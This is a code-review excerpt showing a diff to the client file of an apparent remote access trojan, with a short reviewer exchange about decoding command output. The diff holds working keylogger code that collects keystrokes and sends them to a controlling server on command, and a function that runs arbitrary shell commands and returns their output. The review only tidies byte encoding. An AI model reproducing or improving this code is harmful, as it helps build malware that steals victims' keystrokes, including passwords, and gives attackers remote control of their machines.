src/client.py

```diff
@@ -348,49 +349,46 @@ def keylogger(option):
     if option == "start":
         if not KeyListener.running:
             KeyListener.start()
-            send(str.encode("success"))
+            send(b"success")
         else:
-            send(str.encode("error"))
+            send(b"error")
 
     elif option == "stop":
         if KeyListener.running:
             KeyListener.stop()
             threading.Thread.__init__(KeyListener)  # re-initialise the thread
             strKeyLogs = ""
-            send(str.encode("success"))
+            send(b"success")
         else:
-            send(str.encode("error"))
+            send(b"error")
 
     elif option == "dump":
         if not KeyListener.running:
-            send(str.encode("error"))
+            send(b"error")
         else:
             if strKeyLogs == "":
-                send(str.encode("error2"))
+                send(b"error2")
             else:
                 time.sleep(0.2)
-                send(str.encode(str(len(strKeyLogs))))  # send buffer size
+                send(f"{len(strKeyLogs)}".encode())  # send buffer size
                 time.sleep(0.2)
-                send(str.encode(strKeyLogs))  # send logs
+                send(strKeyLogs.encode())  # send logs
 
                 strKeyLogs = ""  # clear logs
 
 
 def run_command(command):
-    strLogOutput = "\n"
+    LogOutput = b"\n"
 
     if len(command) > 0:
         objCommand = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
-        strLogOutput += (objCommand.stdout.read() + objCommand.stderr.read()).decode("utf-8", errors="ignore")
+        LogOutput += objCommand.stdout.read() + objCommand.stderr.read()
```

Comment:
it needs to be decoded first since there are invalid characters in some commands.

Reply:
You can still send the bytes over without the errors replaces, also if what you're referring to is the tree command, it can be fixed by decoding it in 'cp437' and then printing it on the server.